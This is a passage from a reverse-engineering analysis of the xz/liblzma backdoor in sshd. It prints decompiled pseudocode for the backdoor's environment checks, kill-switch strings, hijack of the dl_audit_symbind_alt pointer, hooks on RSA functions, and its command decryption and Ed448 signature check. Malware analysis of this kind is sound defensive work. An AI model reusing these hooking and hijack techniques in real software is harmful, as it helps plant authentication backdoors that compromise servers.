&libcrypto_elf_info; elf_info_list.maps = &elfs; elf_info_list.self = &elf_info_list; reinitialise_hook_ctx(hook_ctx); ptrb = LOBYTE(l_hook_ctx->result_ptr); runtime_offset = l_hook_ctx->runtime_offset; l_hook_ctx->cpuid_ptr = ptrb; // contains ld_linux_x86_64.so:__tls_get_addr tls_get_addr = *(runtime_offset + 8 * ptrb + 24); // contains return address from liblzma.so:crc64_resolve return_address = l_hook_ctx->return_address; diff = return_address - tls_get_addr; if ( tls_get_addr >= return_address ) diff = tls_get_addr - return_address; if ( diff > 0x50000 ) goto _bd_check_failed; ld_ehdr = (tls_get_addr & 0xFFFFFFFFFFFFF000LL); end_ehdr_search = ld_ehdr - 0x20000; // locate ld_linux_x86_64.so base (ELF header) in process memory while ( reverse_trie_lookup(ld_ehdr, 0LL) != STR__ELF ) { ld_ehdr -= 4096; if ( ld_ehdr == end_ehdr_search ) goto _bd_check_failed; } elf_invoke_input.elf_info_list = &elf_info_list; elf_invoke_input.libc_stack_end = &libc_stack_end; hctx = input->hook_ctx; elf_invoke_input.ehdr = ld_ehdr; elf_invoke_input.return_address = hctx->return_address; // check process name, arguments and environment variables if ( check_conditions(&elf_invoke_input) == Error ) goto _bd_check_failed; ... ``` Here, the backdoor performs the following actions: - it checks its location in memory by comparing `tls_get_addr` address with the return address from `crc64_resolve`: ```c if ( tls_get_addr >= return_address ) diff = tls_get_addr - return_address; if ( diff > 0x50000 ) goto _bd_check_failed; ``` - it searches for the base address of the ld library in process memory: ```c // locate ld_linux_x86_64.so base (ELF header) in process memory while ( reverse_trie_lookup(ld_ehdr, 0LL) != STR__ELF ) { ld_ehdr -= 4096; if ( ld_ehdr == end_ehdr_search ) goto _bd_check_failed; } ``` - it uses the `check_conditions` function to check the following conditions: - the name of the target process is equal to `/usr/sbin/sshd` - the process started with at least one argument, but not with the `-d` argument - the process does not contain environment variables that are contained in the list of decoded strings [2]: - `DISPLAY=` - `LD_AUDIT=` - `LD_BIND_NOT=` - `LD_DEBUG=` - `LD_PROFILE=` - `LD_USE_LOAD_BIAS=` - `LINES=` - `TERM=` - `WAYLAND_DISPLAY=` - `yolAbejyiejuvnup=Evjtgvsh5okmkAvj` We suspect that the value `yolAbejyiejuvnup=Evjtgvsh5okmkAvj` was added to the strings table as a means to provide a kill switch, i.e., to prevent the backdoor from initialising. However, as there are no references to it in the code, we cannot be sure. What we did find, however, was that any string in the prefix trie listed [here](https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01) without whitespace characters can be used as a kill switch. The pseudocode of the `check_conditions` function is shown below: ```c Status __fastcall check_conditions(elf_invoke_input *input) { Elf64_Sym *libc_stack_end_sym; // rax elf_info_t *elf_info; // rdi void **libc_stack_end_off; // r12 if ( parse_elf(input->ehdr, input->elf_info_list->ld_elf_info_p) == Error ) return Error; libc_stack_end_sym = import_lookup(input->elf_info_list->ld_elf_info_p, STR___libc_stack_end_, STR_GLIBC_2_2_5_); if ( !libc_stack_end_sym ) return Error; elf_info = input->elf_info_list->ld_elf_info_p; libc_stack_end_off = &elf_info->ehdr->e_ident[libc_stack_end_sym->st_value]; if ( check_sshd_process(elf_info, *libc_stack_end_off) == Error ) return Error; *input->libc_stack_end = *libc_stack_end_off; return Success; } ``` The checks inside `check_sshd_process` are performed by parsing data located at `libc_stack_end + 8`: ``` [stack]:00007FFFFFFFE550 libc_stack_end dq 2 ; DATA XREF: ld_linux_x86_64.so.2:__libc_stack_end↑o [stack]:00007FFFFFFFE558 process_info dq offset aUsrSbinSshd ; DATA XREF: libc.so.6:__libc_argv↑o [stack]:00007FFFFFFFE558 ; ld_linux_x86_64.so.2:_dl_argv↑o [stack]:00007FFFFFFFE558 ; "/usr/sbin/sshd" [stack]:00007FFFFFFFE560 dq offset asc_7FFFFFFFE7AA ; "-h" [stack]:00007FFFFFFFE568 dq 0 [stack]:00007FFFFFFFE570 dq offset aShellBinBash ; "SHELL=/bin/bash" [stack]:00007FFFFFFFE578 dq offset aSudoGid1000 ; "SUDO_GID=1000" ``` The process of ELF parsing (`parse_elf`) and symbols resolution (`import_lookup`) is documented in [primitives](#elf-parsing). Following condition checks, the backdoor initialises the `shared_objects_ctx` structure: ```c ... so_ctx.maps = &elfs; so_ctx.rela_plt_for_RSA_public_decrypt = &rela_plt_for_RSA_public_decrypt; so_ctx.rela_plt_for_EVP_PKEY_set1_RSA = &rela_plt_for_EVP_PKEY_set1_RSA; so_ctx.rela_plt_for_RSA_get0_key = &rela_plt_for_RSA_get0_key; ftable = input->ftable; so_ctx.elf_info_list = &elf_info_list; all_p = ftable->all_p; so_ctx.standard = &standard; so_ctx.all_p = all_p; if ( process_shared_objects(&so_ctx) == Error ) ... ``` The pseudocode for the `process_shared_objects` function is shown below: ```c Status __fastcall process_shared_objects(shared_objects_ctx *so_ctx) { Elf64_Sym *sym; // rax uint32_t status; // edx r_debug *r_debug; // rax maps_list_t *maps; // rdx struct link_map *r_map; // rdi shared_objects_ctx so_ctx_copy; // [rsp+8h] [rbp-40h] BYREF sym = import_lookup(so_ctx->elf_info_list->ld_elf_info_p, STR__r_debug_, STR_GLIBC_2_2_5_); status = 0; if ( sym ) { r_debug = &so_ctx->elf_info_list->ld_elf_info_p->ehdr->e_ident[sym->st_value]; status = 0; if ( r_debug->r_version > 0 ) { maps = so_ctx->maps; r_map = r_debug->r_map; so_ctx_copy.elf_info_list = so_ctx->elf_info_list; so_ctx_copy.maps = maps; so_ctx_copy.rela_plt_for_RSA_public_decrypt = so_ctx->rela_plt_for_RSA_public_decrypt; so_ctx_copy.rela_plt_for_EVP_PKEY_set1_RSA = so_ctx->rela_plt_for_EVP_PKEY_set1_RSA; so_ctx_copy.rela_plt_for_RSA_get0_key = so_ctx->rela_plt_for_RSA_get0_key; so_ctx_copy.all_p = so_ctx->all_p; so_ctx_copy.standard = so_ctx->standard; *&status = process_shared_objects_map(r_map, &so_ctx_copy) != Error; } } return status; } ``` This function works to construct the following structures: ```c struct maps_list_t { link_map *sshd; link_map *ld_linux_x86_64; link_map *liblzma; link_map *libcrypto; link_map *libsystemd; link_map *libc; }; struct elf_info_list_t { elf_info_t *sshd_elf_info_p; elf_info_t *ld_elf_info_p; elf_info_t *libc_elf_info_p; elf_info_t *liblzma_elf_info_p; elf_info_t *libcrypto_elf_info_p; maps_list_t *maps; elf_info_list_t *self; }; struct shared_objects_ctx { maps_list_t *maps; elf_info_list_t *elf_info_list; uint64_t rela_plt_for_RSA_public_decrypt; uint64_t rela_plt_for_EVP_PKEY_set1_RSA; uint64_t rela_plt_for_RSA_get0_key; all_t *all_p; standard_funcs_t *standard; }; ``` Following this, the backdoor populates the structures with additional information about the strings used in the process memory. We document this in full in [primitives](#strings-references). The pseudocode below summarises how this is done: ```c ... get_string_refs(&sshd_elf_info, &string_refs); liblzma_code_size = 0LL; liblzma_code_start = get_code_start_and_size(elf_info_list.liblzma_elf_info_p, &liblzma_code_size); if ( !liblzma_code_start ) goto _to_exit; all->g_ctx.liblzma_code_start = liblzma_code_start; sz5 = 0x4ELL; all_c = all; all->g_ctx.liblzma_code_end = liblzma_code_size + liblzma_code_start; ... ``` The next key part of the backdoor's execution is parsing the `dl_audit_symbind_alt` code to get the [afcl](https://github.com/bminor/glibc/blob/1f94147a79fcb7211f1421b87383cad93986797f/elf/dl-audit.c#L148) structure pointer. ```c lzma_allocator = get_lzma_allocator(); lzma_allocator->opaque = elf_info_list.libc_elf_info_p; malloc_usable_size = lzma_alloc(STR_malloc_usable_size_, lzma_allocator); all->std.malloc_usable_size = malloc_usable_size; if ( malloc_usable_size ) ++LODWORD(all->std.count); // add imports from libc // add imports from libcrypto // analyse dl_audit_symbind_alt() code to get afct pointer if ( !parse_dl_audit_symbind_alt_and_add_imports(&elf_info_list.maps, &strtab, all, hfuncs) ) goto _to_exit; allocator = get_lzma_allocator(); RSA_get0_key_sym = elf_info_list.libcrypto_elf_info_p; v167 = allocator; allocator->opaque = elf_info_list.libcrypto_elf_info_p; if ( RSA_get0_key_sym ) { RSA_get0_key_sym = import_lookup(RSA_get0_key_sym, STR_RSA_get0_key_, 0); v64 = lzma_alloc(STR_EVP_MD_CTX_new_, v167); all->EVP_MD_CTX_new = v64; if ( v64 ) ++all->imports_count; } ``` At the end of the `bd_install_it_all` function, the pointer of this structure will be overwritten to hijack the control flow of the `dl_audit_symbind_alt` function. The backdoor then recovers the addresses of strings, functions, and offsets that relate to the operation of the `sshd` process. This information is used in subsequent hooks. We show the code responsible for this process below: ```c ... if ( all->BN_bn2bin ) ++all->imports_count; RSA_sign_sym_copy = RSA_sign_sym; // handle list of functions for secret data update // get imports from libcrypto // get sensitive_data.host_keys pointer from sshd if ( install_entries(elf_info_list.sshd_elf_info_p, elf_info_list.libcrypto_elf_info_p, &string_refs, hfuncs, g_ctx_p) == Error ) goto _to_exit; libcrypto_einfo = elf_info_list.libcrypto_elf_info_p; if ( BN_bin2bn_sym ) { BN_bin2bn = &elf_info_list.libcrypto_elf_info_p->ehdr->e_ident[BN_bin2bn_sym->st_value]; ++all->imports_count; all->BN_bin2bn = BN_bin2bn; } ... data_segment = elf_get_data_segment(sshd_elf_info_p, &insn.addr, 0); if ( data_segment ) { addr = insn.addr; if ( string_refs.refs[I2S_mm_request_send_].code_start ) { ssh_ctx->mm_request_send = string_refs.refs[I2S_mm_request_send_].code_start; ssh_ctx->mm_request_receive = string_refs.refs[I2S_mm_request_send_].code_end; LODWORD(sid) = STR_password_; str_password = prefix_trie_decode(sshd_elf, &sid, 0LL); ssh_ctx->str_password_ptr = str_password; if ( str_password && get_checked_reloc_for_symbol( I2S_mm_answer_authpassword_, &ssh_ctx->mm_answer_authpassword_start, &ssh_ctx->mm_answer_authpassword_end, &ssh_ctx->reloc_for_mm_answer_authpassword, sshd_elf, &string_refs, &g_ctx_p->sshd_main_verified) == Error ) { ssh_ctx->mm_answer_authpassword_start = 0LL; ssh_ctx->mm_answer_authpassword_end = 0LL; ssh_ctx->reloc_for_mm_answer_authpassword = 0LL; } LODWORD(sid) = STR_publickey_; str_publickey = prefix_trie_decode(sshd_elf, &sid, 0LL); ssh_ctx->str_publickey = str_publickey; if ( str_publickey ) { if ( get_checked_reloc_for_symbol( I2S_mm_answer_keyallowed_, &ssh_ctx->mm_answer_keyallowed_start, &ssh_ctx->mm_answer_keyallowed_end, &ssh_ctx->reloc_for_mm_answer_keyallowed, sshd_elf, &string_refs, &g_ctx_p->sshd_main_verified) ) { if ( get_checked_reloc_for_symbol( I2S_mm_answer_keyverify_, &ssh_ctx->mm_answer_keyverify_start, &ssh_ctx->mm_answer_keyverify_end, &ssh_ctx->reloc_for_mm_answer_keyverify, sshd_elf, &string_refs, &g_ctx_p->sshd_main_verified) == Error ) { ssh_ctx->mm_answer_keyverify_start = 0LL; ssh_ctx->mm_answer_keyverify_end = 0LL; ssh_ctx->reloc_for_mm_answer_keyverify = 0LL; } } else { ssh_ctx->mm_answer_keyallowed_start = 0LL; ssh_ctx->mm_answer_keyallowed_end = 0LL; ssh_ctx->reloc_for_mm_answer_keyallowed = 0LL; } } ... ``` With this code, the backdoor populates two data structures and the global context used in the main hook function (`RSA_public_decrypt_hook -> hook_main`): ```c struct ssh_logs { uint32_t used; uint32_t mm_log_hander_checked; uint32_t value0; uint32_t value1; char *str__s_key_ptr; ///< %s key char *str__connection_closed_by_ptr; ///< Connection closed by %s char *str_preauth_ptr; ///< preauth] char *str_authenticating_ptr; ///< authenticating char *str_user_group_ptr; ///< user:group %u:%u char *func_mm_log_hander_ptr; ///< mm_log_hander() ptr uint64_t mm_log_hander_hook_p; uint64_t mm_log_hander_original; uint64_t mm_log_hander_hook; void *func_sshlogv; ///< sshlogv() void *handle_logging; ///< 0xA3D0 func uint64_t value4; ///< 0xA40 }; struct ssh_ctx { uint32_t mm_answer_keyverify_value; ///< 0x100000001 uint32_t str_unknown_ptr_is_null; uint32_t mm_answer_keyverify_is_not_null; uint32_t value0; Status (__fastcall *change_unknown_to_password)(uint64_t flag0, int fd, uint64_t flag1); void *mm_answer_keyallowed_hook; Status (__fastcall *change_unknown_to_publickey)(uint64_t flag, char *buffer); uint8_t *mm_answer_authpassword_start; uint8_t *mm_answer_authpassword_end; uint8_t *reloc_for_mm_answer_authpassword; uint64_t value1; ///< 0x00 uint8_t *mm_answer_keyallowed_start; uint8_t *mm_answer_keyallowed_end; uint64_t reloc_for_mm_answer_keyallowed; uint64_t value2; ///< 0x00 uint8_t *mm_answer_keyverify_start; uint8_t *mm_answer_keyverify_end; uint8_t *reloc_for_mm_answer_keyverify; uint32_t value3; uint16_t buffer_size; uint16_t value4; uint64_t current_buffer; uint64_t value5; uint8_t *unknown_to_password_buf; char *str_unknown_ptr; void *mm_request_send; void *mm_request_receive; uint64_t flag; ///< 0x01 uint64_t *start_pam_displ; uint64_t *auth_root_allowed_displ; char *str_password_ptr; char *str_publickey; }; ``` It should be noted that in the `install_entries` function, the backdoor obtains a pointer of the `sensitive_data` structure using analysis of x-refs for the following strings: - `xcalloc: zero size` - `KRB5CCNAME` The code pattern that is responsible for this is shown below: ```c // get sensitive_data.host_keys pointer from sshd res = handle_calloc_zero_size_caller(data_segment, &data_segment[size], address, *ssh_code_end, string_refs, &displ); v18 = handle_func_with_krb5ccname_ref(data_segment, &data_segment[size], address, *ssh_code_end, &addr, sshd_elf_info); v19 = lzma_alloc(STR_EVP_chacha20_, v25); hfuncs->EVP_chacha20 = v19; if ( v19 ) ++hfuncs->count; if ( !res ) { if ( !v18 ) { _free: lzma_free(hfuncs->EVP_DigestVerifyInit, v25); lzma_free(hfuncs->EVP_CIPHER_CTX_new, v25); lzma_free(hfuncs->EVP_chacha20, v25); return Error; } res0 = 0; goto _label1; } if ( !v18 ) { res0 = value_from_strings_refs_check(displ, sshd_elf_info, string_refs); res1 = 0; goto _label2; } g_sensitive_data = displ; if ( displ != addr ) { res0 = value_from_strings_refs_check(displ, sshd_elf_info, string_refs); _label1: res1 = value_from_strings_refs_check(addr, sshd_elf_info, string_refs); _label2: if ( res0 >= res1 && res0 > 7 ) { g_sensitive_data = displ; goto _set_structure; } if ( res1 >= res0 && res1 > 7 ) { g_sensitive_data = addr; goto _set_structure; } goto _free; } if ( value_from_strings_refs_check(displ, sshd_elf_info, string_refs) > 7 ) { _set_structure: g_ctx->sensitive_data = g_sensitive_data; return Success; } ``` In this snippet, the backdoor locates the [following code](https://github.com/openssh/openssh-portable/blob/88351eca17dcc55189991ba60e50819b6d4193c1/sshd.c#L1831) and saves the `sensitive_data *sensitive_data` structure pointer to the global context structure. This structure is actively used in `hook_main` function. And at the end of the `bd_table_init` function, the backdoor installs a hook for `_dl_audit_symbind_alt`: ```c all->ftable_install_hooks = input->ftable->install_hooks; *all->afct_ptr = &all->afct_new_label; allocc = alloc; *all->afct_installed = 1; ``` Within this hook, the backdoor overwrites a pointer in `afct`, so that `afct->symbind` will point to `install_hooks` (`.text.lz_encoder_prepara:00000000000028C0`): - https://github.com/bminor/glibc/blob/1f94147a79fcb7211f1421b87383cad93986797f/elf/dl-audit.c#L148 - https://github.com/bminor/glibc/blob/1f94147a79fcb7211f1421b87383cad93986797f/elf/dl-audit.c#L159C1-L162C44 As a result, during the execution of the following code inside `_dl_audit_symbind_alt`, the backdoor's `install_hooks` function will be called: ```c uintptr_t new_value = afct->symbind (&sym, ndx, &match_audit->cookie, &result_audit->cookie, &flags, strtab + ref->st_name); ``` In case of any unsuccessful operations inside `bd_install_it_all`, the `dl_audit_hook_uninstall` function will be called (located at `.text.lzma_block_buffer_bound63:0000000000002760` in object file). ## install_hooks The pseudocode of the function that sets the hooks in the context of the `_dl_audit_symbind_alt` function is as follows: ```c uint64_t __fastcall install_hooks(Elf64_Sym *sym, __int64 a2, __int64 a3, __int64 a4, __int64 a5, unsigned __int8 *a6) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] api_ctx = g_all; hfuncs = g_all->hfuncs; if ( !LODWORD(g_all->hook_setup_finished) ) { dl_audit_symbind_alt = g_all->dl_audit_symbind_alt; libc_stack_end = g_ctx->standard->libc_stack_end; if ( dl_audit_symbind_alt >= retaddr || g_all->dl_audit_symbind_alt_sym_st_size + dl_audit_symbind_alt < retaddr - dl_audit_symbind_alt ) { goto _finish; } sid = reverse_trie_lookup(a6, 0LL); RSA_public_decrypt_hook_ptr = hfuncs->RSA_public_decrypt_hook_ptr; if ( sid == STR_RSA_public_decrypt_ && RSA_public_decrypt_hook_ptr ) { if ( *RSA_public_decrypt_hook_ptr > 0xFFFFFF ) { // rewrite RSA_public_decrypt pointer hfuncs->RSA_public_decrypt = *RSA_public_decrypt_hook_ptr; RSA_public_decrypt_hook = api_ctx->RSA_public_decrypt_hook; *RSA_public_decrypt_hook_ptr = RSA_public_decrypt_hook; if ( sym > retaddr && sym < libc_stack_end ) sym->st_value = RSA_public_decrypt_hook; } goto _update_api_ctx; } evp_pkey_set1_rsa_hook_ptr = hfuncs->EVP_PKEY_set1_RSA_hook_ptr_null; if ( evp_pkey_set1_rsa_hook_ptr && sid == STR_EVP_PKEY_set1_RSA_ ) { if ( *evp_pkey_set1_rsa_hook_ptr <= 0xFFFFFF ) goto _update_api_ctx; // rewrite EVP_PKEY_set1_RSA pointer hfuncs->EVP_PKEY_set1_RSA_null = *evp_pkey_set1_rsa_hook_ptr; EVP_PKEY_set1_RSA_hook = api_ctx->EVP_PKEY_set1_RSA_hook; *evp_pkey_set1_rsa_hook_ptr = EVP_PKEY_set1_RSA_hook; if ( sym > retaddr && sym < libc_stack_end ) sym->st_value = EVP_PKEY_set1_RSA_hook; RSA_get0_key_hook_ptr_null = hfuncs->RSA_get0_key_hook_ptr_null; if ( !RSA_get0_key_hook_ptr_null ) goto _update_api_ctx; hook = *RSA_get0_key_hook_ptr_null <= 0xFFFFFFuLL; } else { rsa_get0_key_hook_ptr = hfuncs->RSA_get0_key_hook_ptr_null; if ( sid != STR_RSA_get0_key_ || !rsa_get0_key_hook_ptr ) return sym->st_value; if ( *rsa_get0_key_hook_ptr <= 0xFFFFFF ) goto _update_api_ctx; // rewrite RSA_get0_key pointer hfuncs->RSA_get0_key_null = *rsa_get0_key_hook_ptr; RSA_get0_key = api_ctx->RSA_get0_key_; *rsa_get0_key_hook_ptr = RSA_get0_key; if ( sym > retaddr && sym < libc_stack_end ) sym->st_value = RSA_get0_key; if ( !evp_pkey_set1_rsa_hook_ptr ) goto _update_api_ctx; hook = *evp_pkey_set1_rsa_hook_ptr <= 0xFFFFFF; } if ( !hook ) { _update_api_ctx: dl_audit_hook_uninstall(api_ctx); _finish: LODWORD(api_ctx->hook_setup_finished) = 1; } } return sym->st_value; } ``` This function attempts to set hooks on three functions from `libcrypto`. After the first successful hook has been set, `_dl_audit_symbind_alt` will be uninstalled. The three possible hooks are as follows: - `RSA_public_decrypt`: `RSA_public_decrypt_hook` (`.text.lzma_index_prealloa:000000000000A270`): ```c int __fastcall RSA_public_decrypt_hook(unsigned int flen, uint8_t *from, uint8_t *to, RSA *r) { hfuncs_t *hfuncs; // rax int (__fastcall *RSA_public_decrypt_orig_func)(int, unsigned __int8 *, unsigned __int8 *, RSA *, int); // r14 int result; // eax RSA *key; // [rsp+0h] [rbp-48h] uint32_t status; // [rsp+1Ch] [rbp-2Ch] BYREF if ( !g_ctx ) return 0; hfuncs = g_ctx->hfuncs; if ( !hfuncs ) return 0; RSA_public_decrypt_orig_func = hfuncs->RSA_public_decrypt; if ( !hfuncs->RSA_public_decrypt ) return 0; if ( !r ) return (RSA_public_decrypt_orig_func)(flen, from, to, r); key = r; status = 1; result = hook_main(r, g_ctx, &status); r = key; if ( status ) return (RSA_public_decrypt_orig_func)(flen, from, to, r); return result; } ``` - `RSA_get0_key`: `RSA_get0_key_hook` (`.text.lzma_index_inia:000000000000A360`): ```c void __fastcall RSA_get0_key_hook(RSA *r, BIGNUM **n, BIGNUM **e) { hfuncs_t *hfuncs; // rax void (__fastcall *RSA_get0_key_orig_func)(const RSA *, const BIGNUM **, const BIGNUM **, const BIGNUM **); // r14 uint32_t *status; // [rsp+1Ch] [rbp-1Ch] BYREF if ( g_ctx ) { hfuncs = g_ctx->hfuncs; if ( hfuncs ) { RSA_get0_key_orig_func = hfuncs->RSA_get0_key_null; if ( RSA_get0_key_orig_func ) { if ( r ) hook_main(r, g_ctx, &status); (RSA_get0_key_orig_func)(r, n, e); } } } } ``` - `EVP_PKEY_set1_RSA`: `EVP_PKEY_set1_RSA_hook` (`.text.lzma_index_memusaga:000000000000A300`): ```c int __fastcall EVP_PKEY_set1_RSA_hook(EVP_PKEY *pkey, RSA *r) { hfuncs_t *hfuncs; // rax int (__fastcall *EVP_PKEY_set1_RSA_null)(EVP_PKEY *, struct rsa_st *); // r12 uint32_t *status; // [rsp+Ch] [rbp-1Ch] BYREF if ( !g_ctx ) return 0; hfuncs = g_ctx->hfuncs; if ( !hfuncs ) return 0; EVP_PKEY_set1_RSA_null = hfuncs->EVP_PKEY_set1_RSA_null; if ( !EVP_PKEY_set1_RSA_null ) return 0; if ( r ) hook_main(r, g_ctx, &status); return EVP_PKEY_set1_RSA_null(pkey, r); } ``` As we can see, in all three cases, the `hook_main` backdoor function will be executed, which we will focus on in the next section. # hook main In this section we describe the functionality of the main hooking function `hook_main`. After backdoor initialisation, `hook_main` will be executed when the `sshd` process calls the `RSA_public_decrypt` function to verify a client's public key during the SSH handshake: ```c Status hook_main(RSA *r, global_ctx *ctx, uint32_t *status) ``` As discussed earlier, this function can be called in the context of three functions: `RSA_public_decrypt`, `RSA_get0_key`, `EVP_PKEY_set1_RSA`. However, we only managed to trigger it with `RSA_public_decrypt` (if the backdoor finds a way to hook at least one of them, the others are skipped). The pseudocode of the beginning of the `hook_main` function is shown below: ```c if ( !ctx ) { _exit: if ( !ret_status ) return Error; goto _call_original; } if ( ctx->hook_finished || !rsa_key || (hfuncs = ctx->hfuncs) == 0LL || (RSA_get0_key = hfuncs->RSA_get0_key) == 0LL || !hfuncs->BN_bn2bin ) { ctx->hook_finished = 1; goto _exit; } if ( status ) { rsa = rsa_key; *ret_status = 1; RSA_get0_key(rsa, &n, &e, 0LL); if ( n ) { if ( e ) { ossl = ctx->hfuncs; if ( ossl ) { BN_num_bits = ossl->BN_num_bits; if ( BN_num_bits ) { n_bits = (BN_num_bits)(); if ( n_bits <= 0x4000 ) { n_bytes_count = (n_bits + 7) >> 3; // check n size in bytes if ( n_bytes_count - 20 <= 516 ) { BN_bn2bin_res = ctx->hfuncs->BN_bn2bin(n, &modulus.magic_params); if ( BN_bn2bin_res >= 0 ) { n_size = n_bytes_count; if ( n_bytes_count >= BN_bn2bin_res ) { if ( BN_bn2bin_res <= 0x10 ) goto _call_original; if ( !modulus.magic_params.a ) goto _call_original; if ( !modulus.magic_params.b ) goto _call_original; // 4 possible values: 0, 1, 2, 3 // bd_command = modulus.magic_params.c + modulus.magic_params.b * modulus.magic_params.a // to get 0: -4294967295(0xffffffff00000001) + (-1 * 1) // to get 1: 0 + (1 * 1) // to get 2: 1 + (1 * 1) // to get 3: 2 + (1 * 1) bd_command = modulus.magic_params.c + modulus.magic_params.b * modulus.magic_params.a; if ( bd_command > 3 ) goto _call_original; ... ``` It starts by parsing the client's public RSA key. It uses the `RSA_get0_key` function to obtain values for `BIGNUM *n` (modulus) and `BIGNUM *e` (exponent). It then converts the RSA modulus `n` to bytes (`modulus`) using the `BN_bn2bin` function. These bytes correspond to the main payload of the command sent by the operator of the backdoor. The structure of the modulus as follows: ```c struct ciphertext_t { uint8_t signature[114]; uint8_t flags0; uint8_t flags1; uint8_t flags2; uint8_t length; uint8_t flags4; uint8_t command[121]; }; struct magic_params_t { uint32_t a; uint32_t b; uint64_t c; }; struct prefix_t { uint8_t flags0; uint8_t flags1; uint8_t flags2; uint8_t length; uint8_t flags4; }; struct modulus_t { prefix_t cmd_bytes; magic_params_t magic_params; ciphertext_t ciphertext; }; ``` The backdoor calculates the value of `bd_command` from the values of `modulus.magic_params.c`, `modulus.magic_params.b`, and `modulus.magic_params.a`. The resulting `bd_command` can take the values 0, 1, 2, and 3. If the value is greater than 3, the backdoor bails and calls the original `RSA_public_decrypt` function. If `bd_command` is valid, the backdoor proceeds to decrypt the ciphertext: ```c ... standard = ctx->standard; if ( standard ) { if ( standard->getuid ) { if ( standard->_exit ) { if ( ctx->ssh_logs_p ) { // check that ctx->secret_data will have the expected value if ( ctx->reg2reg_insn_count == 0x1C8 ) { header_value = modulus.magic_params; // decrypt g_ctx->secret_data to get ed448_public_key if ( decrypt_ed448_public_key(ed448_public_key, ctx) ) { // decrypt ciphertext using ed448_public_key[:32] as a key // and a, b, c as an IV if ( chacha20_decrypt( modulus.ciphertext.signature, n_bytes_count - 16, ed448_public_key, &header_value, modulus.ciphertext.signature, ctx->hfuncs) ) ... ``` It decrypts `g_ctx->secret_data` to get `ed448_public_key`: ```c Status __fastcall decrypt_ed448_public_key(uint8_t *out, global_ctx *ctx) { hfuncs_t *hfuncs; // r9 size_t i; // rcx uint32_t *p1; // rdi size_t j; // rcx uint32_t *p2; // rdi uint8_t key1[32]; // [rsp-20h] [rbp-B8h] BYREF uint8_t iv1[16]; // [rsp+0h] [rbp-98h] BYREF uint8_t key2[32]; // [rsp+10h] [rbp-88h] BYREF uint8_t iv2[16]; // [rsp+30h] [rbp-68h] BYREF if ( !out ) return 0; if ( ctx ) { hfuncs = ctx->hfuncs; if ( hfuncs ) { i = 12LL; p1 = key1; while ( i ) { *p1++ = 0; --i; } j = 28LL; p2 = key2; while ( j ) { *p2++ = 0; --j; } if ( chacha20_decrypt(key1, 0x30uLL, key1, iv1, key2, hfuncs) ) return chacha20_decrypt(ctx->secret_data, 0x39uLL, key2, iv2, out, ctx->hfuncs) != Error; } } return Error; } ``` It then decrypts `modulus.ciphertext` using `ed448_public_key[:32]` as the key and `modulus.magic_params` as the IV. The pseudocode of `chacha20_decrypt` function is shown below: ```c Status __fastcall chacha20_decrypt( uint8_t *in, size_t length, uint8_t *key, uint8_t *iv, uint8_t *out, hfuncs_t *hfuncs) { Status status; // ebp hfuncs_t *funcs; // r9 EVP_CIPHER_CTX *ctx; // rbx unsigned __int8 *cipher; // rsi void (__fastcall *EVP_CIPHER_CTX_free0)(EVP_CIPHER_CTX *); // rdx void (__fastcall *EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *); // rax int (__fastcall *EVP_DecryptInit_ex)(EVP_CIPHER_CTX *, const EVP_CIPHER *, ENGINE *, const unsigned __int8 *, const unsigned __int8 *); // [rsp+8h] [rbp-50h] int outl; // [rsp+1Ch] [rbp-3Ch] BYREF outl = 0; if ( in ) { if ( length ) { if ( iv ) { if ( out ) { if ( hfuncs ) { if ( check_ptrslen(&hfuncs->EVP_CIPHER_CTX_new, 6u) == Error ) { ctx = funcs->EVP_CIPHER_CTX_new(); if ( ctx ) { EVP_DecryptInit_ex = hfuncs->EVP_DecryptInit_ex; cipher = hfuncs->EVP_chacha20(); if ( EVP_DecryptInit_ex(ctx, cipher, 0LL, key, iv) == 1 ) { cipher = out; if ( hfuncs->EVP_DecryptUpdate(ctx, out, &outl, in, length) == 1 && outl >= 0 ) { cipher = &out[outl]; status = hfuncs->EVP_DecryptFinal_ex(ctx, cipher, &outl); if ( status == Success ) { EVP_CIPHER_CTX_free0 = hfuncs->EVP_CIPHER_CTX_free; if ( outl >= 0 && length >= outl ) { EVP_CIPHER_CTX_free0(ctx); return status; } } } } EVP_CIPHER_CTX_free = hfuncs->EVP_CIPHER_CTX_free; if ( EVP_CIPHER_CTX_free ) (EVP_CIPHER_CTX_free)(ctx); } } } } } } } return Error; } ``` This gives the backdoor a decrypted ED448 signature (114 bytes). The `ed448_public_key` is used for verification. The signature verification routine is shown below: ```c host_keys = sensitive_data->host_keys; params0 = 0LL; if ( host_keys ) { host_pubkeys = sensitive_data->host_pubkeys; if ( host_pubkeys ) { if ( host_keys != host_pubkeys && sensitive_data->have_ssh2_key <= 1u ) { // check for sensitive_data->host_keys if ( check_malloc_usable_size(host_keys, ¶ms, ctx->standard) ) { // check for sensitive_data->host_pubkeys if ( check_malloc_usable_size( ctx->sensitive_data->host_pubkeys, ¶ms0, ctx->standard) ) { params_c = params; if ( params == params0 ) { ed448_public_key0 = &out; if ( decrypt_ed448_public_key(&out, ctx) ) { host_pubkeys_index = 0LL; do { verified_key_index = host_pubkeys_index; if ( host_pubkeys_index >= params_c.param0 ) goto _finished; host_pubkeys_prev_index = host_pubkeys_index; value = &cmd_info; verification_status = verify_ed448_signature( ctx->sensitive_data->host_pubkeys[host_pubkeys_index], &cmd_info, hoffset + 4, 604uLL, modulus.ciphertext.signature, ed448_public_key0, ctx); host_pubkeys_index = host_pubkeys_prev_index + 1; } while ( verification_status == Error ); ctx->host_pubkey_index = verified_key_index; ... ``` Inside the `verify_ed448_signature` function the following happens: - depending on the host public key type (EC, RSA, DSA), it parses the host public key and computes SHA256 from it - it verify the signature using the message and ED448 public key, where the message has the following structure: - `bd_command` value - SHA256 from host public key - payload data except signature itself Client-side signature calculation is well documented in the xzbot source code [here](https://github.com/amlweems/xzbot/blob/8ae5b706fb2c6040a91b233ea6ce39f9f09441d5/main.go#L85C1-L89C55). If signature verification fails for all host public keys, the backdoor exits the `hook_main` function and calls the original `RSA_public_decrypt` function. Thus, only ED448 private key holders can perform the attack. In addition, even if the backdoor code (in its later functionality) contains binary vulnerabilities, no one but the authors will be able to exploit them on infected systems. The attacker's ED448 public key, which will be obtained during the backdoor operation (from `g_ctx->secret_data`) is shown below: ``` 0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28 34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48 10 0c b0 6c 3a be 14 ee 89 55 d2 